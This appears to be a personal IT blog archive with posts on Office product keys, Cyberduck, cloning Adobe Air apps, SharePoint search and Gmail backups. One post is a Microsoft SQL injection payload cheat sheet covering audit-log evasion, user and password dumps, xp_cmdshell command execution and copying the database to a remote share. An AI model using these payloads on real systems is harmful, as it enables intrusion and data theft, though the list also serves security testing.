Lost product keys

A few years back I stumbled upon a utility called Magical Jelly Bean with its intended purpose of finding the product key of installed Microsoft applications, primarily the OS itself as I used this to determine which VLK was used for imagine deployment in the datacenters.

Looks like the product has not received updates in awhile and I’ve been trying to find a key recently of my office installation so that I can migrate the install to a new fusion VM.

For starters we can determine the last 5 digits of a product key default in the office application.

:command prompt
\program files\microsoft office\office14\
cscript ospp.vbs /dstatus
::Last 5 characters of installed product key: XXXXX

Alternately we can completely change the product key
Expand the registration key, you will find different keys for the office suites looking like {XXX}
In each one of these look for DigitalProductID and ProductID, delete them, close registry restart the office apps and you will be prompted for a new key.

In office 2010 you can also change the key via the command line, this is new, 2 ways of doing so.
Option 1) Add/Remove programs, locate office, change, new product key (yawnnnnn)
Option 2) Instead of /dstatus argument for OSPP.VBS use /inpkey:XXXXX-XXXX-XXXX (key value)


Cloud file management! Cyberduck

Having installed OSX Lion I’ve been on an mission to re-evaluate all of my applications and remove or update those which I am still using.  A key tool i was missing and essential for every Apple is management of cloud storage repositories through 3rd party and to make matters even better support for less known providers protocol support FTP, SFTP, WebDAV, Amazon S3, Windows Azure and Google Storage.

Not just that but it’s free – everyone’s favorite price! Take a look at Cyberduck http://cyberduck.ch/ They also have a version out for Windows.

I’m really happy to see Google Docs support since i’ve been actively using it and trying to find the right place to organize and sort my docs directories.

How to run multiple Adobe Air apps Tweetdeck

Twitter columns can get pretty busy if your tweeting from multiple accounts.
I wanted to find the benefits of utilizing 2 display monitors for separate accounts or in some cases the same accounts with unique columns per screen for tweets based on topics, followers or lists.

An application has been written by Chris Deely named AirAppDuplicator
Download it here

Get started by clicking download and then on AirAppDuplicator.AIR package. Proceed past the warnings to install and trust this product (at your own risk). When the application has finished installing right click to run as Administrator if your in Windows to get the Air Apps to clone, you will only have to do this once.

Last step, navigate to the directory path of the application you want to duplicate, in my case it was Tweetdeck located in c:\program files (x86)\tweetdeck on my windows 7 machine and click to clone. What actually happens is AirAppDuplicator will copy the directory to a similar directory appending 2 at the end of the name.

I haven’t run into any issues yet with multiple instances and i’m not the author of the application. Use at your own risk! 😉

MSSQL Injection Commands and Output

» Microsoft SQL

Payload Description (if any)
‘admin –sp_password sp_traceXXX audit evasion. The sp_password prevents storing clear text passwords in the log files. Appending this after your comments (–) can prevent SQL Injection queries being logged.
select @@version View database version.
select @@servername Misc. information disclosure
select @@microsoftversion Misc. information disclosure
select * from master..sysservers Misc. information disclosure
select * from sysusers View database usernames and passwords.
exec master..xp_cmdshell ‘ipconfig+/all’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+view’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘net+users’ Misc. command execution with cp_cmdshell.
exec master..xp_cmdshell ‘ping+system-controlled-by-attacker’ Misc. command execution with cp_cmdshell – this is useful for blind SQL Injection tests (where no results are displayed).
BACKUP database master to disks=’\\{IP}\{sharename}\backupdb.dat’ Backup entire database to a file. This attack can be used to steal a database.
create table myfile (line varchar(8000))” bulk insert foo from ‘c:\inetpub\wwwroot\auth.asp’” select * from myfile”– Reading files on the filesystem.
xp_servicecontrol (START or STOP) Start and stop Windows Services.
str1 + str2 OR n+n Concat strings for blind SQL Injection tests.

A simple query

Advanced Search in Sharepoint 2007

Recently I’ve been working on a deployment of an enterprise sharepoint portal for a friend of mine and building it from the ground up utilizing all there is available in sharepoint we got to the point where the next step was search functionality.   There is a lot of documentation out there regarding how to setup search and I think i’ll just make a video for that later on however I wanted to touch on a topic of how to utilize search after it’s actually setup.

You might notice your sharepoint portal site is default searching ‘This Site:’ and that doesn’t exactly work out the way it should, seems like it searches nothing at all.

An easy fix in doing so, first backup a  copy of SearchArea.xml to SearchArea.xml.bak for example, it’s located in C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\TEMPLATE\FEATURES\OSearchEnhancedFeature\

Then edit the file and make the following changes

Change UseSiteDefaults from True to False
Right above this entry add DropDownMode and set the value to ShowDD

Happy Searching!!

Gmail and cloud computing data integrity

Chances are everyone has a Gmail account today, whether they use it or not the popularity
of Gmail has gone from invitation only 10 years ago to free open registration and use today. Popularity basis of Gmail is ranked next to that of Hotmail.com, Yahoo.com and Aol.com email addresses by my own research study.  In addition, Gmail users also count for every Android device as one of these accounts is required to activate on the mobile.

How much value is put into mail availability?  In addition that includes not only messages but contacts, tasks, conversations and all of the other social media channels available through the major players.  Some users never delete anything their Mailbox is something along the lines of a database and it has archives of every conversation.

The reality how would one take the total loss of all contents from their Gmail account, such a terrifying thought just happened over the weekend and although the impact was 500,000 users in actuality based on an Engadget.com report this is only about 0.29% of all Google Gmail users.  That is very impressive number of users although considering it is a free service.  Lucky for me I was not affected by this catastrophic loss of data however I couldn’t stress the importance of backups.  Setup a carbon copy forwarder for all of your messages, I personally dupe mine between @Hotmail and @Gmail this way I have redundancy and a free widely used web service available from anywhere on the internet.

The idea here is that your email is in the cloud and your information is highly available, fast and accessible from anywhere but that’s only as long as you have a backup copy of it. Gmail is a free service and while their engineers are working on recovery for all of its users, cloud computing service are only as resilient as what the end-user has signed up to become and the price to pay for complete data availability.

Loss of data is no fun and it can be a disaster if the backups are not in place considering the medium that is effected such data loss can turn a company or end user upside down. These fallouts are not new to us although generally speaking we aren’t worried about it unless it happens to us.

Just last month in early January of this year, Hotmail.com lost all email for 17,355 customers and while it took about 3 days to get customers mailboxes back not all of them were able to be recovered says the report on InfoWorld here.

Does this change your thoughts when it comes to cloud computing and will you start backing up your information today?